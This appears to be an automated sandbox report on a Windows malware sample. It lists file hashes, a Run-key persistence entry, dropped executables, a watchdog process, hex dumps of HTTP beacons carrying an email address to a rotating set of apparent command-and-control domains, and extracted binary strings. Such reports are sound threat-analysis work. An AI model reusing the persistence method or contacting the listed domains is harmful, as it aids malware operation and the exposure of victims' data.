Analysis Date2014-09-19 04:38:45

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 8230a0256893069887e597f4c4796b0c sha1: 1b81925fcc1a5e180e51d2f35f6f31ac607c639b size: 291840
Section.rdata md5: 50fd61f463e5b61f49c06c5f6a237164 sha1: 7ad63f82197673ead30ca8166f1652ab7e6778f9 size: 33280 md5: 0b831a7f44b49abac6a110c84dd9366c sha1: 9f64cdb18e4d038b1b605588f20a24050510aaaa size: 105984
Timestamp2014-07-24 05:04:52
PackerMicrosoft Visual C++ ?.?

Runtime Details:


↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Provider Connectivity Security Sharing ➝
C:\Documents and Settings\Administrator\Application Data\vbbketmfxnfca\cbdaafmkimt.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\vbbketmfxnfca\cbdaafmkimt.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\vbbketmfxnfca\cbdaafmkimt.exe

↳ C:\Documents and Settings\Administrator\Application Data\vbbketmfxnfca\cbdaafmkimt.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\vbbketmfxnfca\odjhmtszjizs.exe
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\vbbketmfxnfca\cbdaafmkimt.sdyb4
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\vbbketmfxnfca\cbdaafmkimt.exe"

↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\vbbketmfxnfca\cbdaafmkimt.exe"

Flows TCP192.168.1.1:1031 ➝
Flows TCP192.168.1.1:1032 ➝
Flows TCP192.168.1.1:1033 ➝
Flows TCP192.168.1.1:1034 ➝
Flows TCP192.168.1.1:1035 ➝
Flows TCP192.168.1.1:1036 ➝
Flows TCP192.168.1.1:1037 ➝
Flows TCP192.168.1.1:1038 ➝
Flows TCP192.168.1.1:1039 ➝
Flows TCP192.168.1.1:1040 ➝
Flows TCP192.168.1.1:1041 ➝

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d676475 6e646173 4065746d   mail=gdundas@etm
0x00000020 (00032)   632e6f72 67266d65 74686f64 3d706f73
0x00000030 (00048)   74204854 54502f31 2e300d0a 41636365   t HTTP/1.0..Acce
0x00000040 (00064)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000050 (00080)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000060 (00096)   3a207468 696e6b62 65796f6e 642e6e65   :
0x00000070 (00112)   740d0a0d 0a                           t....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d676475 6e646173 4065746d   mail=gdundas@etm
0x00000020 (00032)   632e6f72 67266d65 74686f64 3d706f73
0x00000030 (00048)   74204854 54502f31 2e300d0a 41636365   t HTTP/1.0..Acce
0x00000040 (00064)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000050 (00080)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000060 (00096)   3a207072 6573656e 74626569 6e672e6e   : presentbeing.n
0x00000070 (00112)   65740d0a 0d0a                         et....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d676475 6e646173 4065746d   mail=gdundas@etm
0x00000020 (00032)   632e6f72 67266d65 74686f64 3d706f73
0x00000030 (00048)   74204854 54502f31 2e300d0a 41636365   t HTTP/1.0..Acce
0x00000040 (00064)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000050 (00080)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000060 (00096)   3a206368 69656662 65696e67 2e6e6574   :
0x00000070 (00112)   0d0a0d0a 0d0a                         ......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d676475 6e646173 4065746d   mail=gdundas@etm
0x00000020 (00032)   632e6f72 67266d65 74686f64 3d706f73
0x00000030 (00048)   74204854 54502f31 2e300d0a 41636365   t HTTP/1.0..Acce
0x00000040 (00064)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000050 (00080)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000060 (00096)   3a207477 656c7665 666f7265 7665722e   : twelveforever.
0x00000070 (00112)   6e65740d 0a0d0a                       net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d676475 6e646173 4065746d   mail=gdundas@etm
0x00000020 (00032)   632e6f72 67266d65 74686f64 3d706f73
0x00000030 (00048)   74204854 54502f31 2e300d0a 41636365   t HTTP/1.0..Acce
0x00000040 (00064)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000050 (00080)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000060 (00096)   3a206869 73746f72 79666f72 65766572   : historyforever
0x00000070 (00112)   2e6e6574 0d0a0d0a                     .net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d676475 6e646173 4065746d   mail=gdundas@etm
0x00000020 (00032)   632e6f72 67266d65 74686f64 3d706f73
0x00000030 (00048)   74204854 54502f31 2e300d0a 41636365   t HTTP/1.0..Acce
0x00000040 (00064)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000050 (00080)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000060 (00096)   3a207765 61746865 72666f72 65766572   : weatherforever
0x00000070 (00112)   2e6e6574 0d0a0d0a                     .net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d676475 6e646173 4065746d   mail=gdundas@etm
0x00000020 (00032)   632e6f72 67266d65 74686f64 3d706f73
0x00000030 (00048)   74204854 54502f31 2e300d0a 41636365   t HTTP/1.0..Acce
0x00000040 (00064)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000050 (00080)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000060 (00096)   3a20636c 61737362 65796f6e 642e6e65   :
0x00000070 (00112)   740d0a0d 0a0a0d0a                     t.......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d676475 6e646173 4065746d   mail=gdundas@etm
0x00000020 (00032)   632e6f72 67266d65 74686f64 3d706f73
0x00000030 (00048)   74204854 54502f31 2e300d0a 41636365   t HTTP/1.0..Acce
0x00000040 (00064)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000050 (00080)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000060 (00096)   3a207468 696e6b66 6c6f7765 722e6e65   :
0x00000070 (00112)   740d0a0d 0a0a0d0a                     t.......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d676475 6e646173 4065746d   mail=gdundas@etm
0x00000020 (00032)   632e6f72 67266d65 74686f64 3d706f73
0x00000030 (00048)   74204854 54502f31 2e300d0a 41636365   t HTTP/1.0..Acce
0x00000040 (00064)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000050 (00080)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000060 (00096)   3a207072 6573656e 74666c6f 7765722e   : presentflower.
0x00000070 (00112)   6e65740d 0a0d0a0a                     net.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d676475 6e646173 4065746d   mail=gdundas@etm
0x00000020 (00032)   632e6f72 67266d65 74686f64 3d706f73
0x00000030 (00048)   74204854 54502f31 2e300d0a 41636365   t HTTP/1.0..Acce
0x00000040 (00064)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000050 (00080)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000060 (00096)   3a20636f 6c6c6567 65636f72 6e65722e   : collegecorner.
0x00000070 (00112)   6e65740d 0a0d0a0a                     net.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d676475 6e646173 4065746d   mail=gdundas@etm
0x00000020 (00032)   632e6f72 67266d65 74686f64 3d706f73
0x00000030 (00048)   74204854 54502f31 2e300d0a 41636365   t HTTP/1.0..Acce
0x00000040 (00064)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000050 (00080)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000060 (00096)   3a206f66 74656e66 6c6f7765 722e6e65   :
0x00000070 (00112)   740d0a0d 0a0d0a0a                     t.......

An application has made an attempt to load the C runtime library incorrectly.
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
bad allocation
bad exception
 Base Class Array'
 Base Class Descriptor at (
 Class Hierarchy Descriptor'
 Complete Object Locator'
DOMAIN error
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector constructor iterator'
`eh vector copy constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`eh vector vbase copy constructor iterator'
invalid string position
`local static guard'
`local static thread guard'
`local vftable'
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
`omni callsig'
`placement delete closure'
`placement delete[] closure'
Please contact the application's support team for more information.
<program name unknown>
- pure virtual function call
runtime error 
Runtime Error!
`scalar deleting destructor'
SING error
string too long
+t HHt
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
< tK<	tG
TLOSS error
t$<"u	3
 Type Descriptor'
`udt returning'
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
Unknown exception
$ UXp0
`vbase destructor'
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
@vgX ;
`virtual displacement map'
v	N+D$
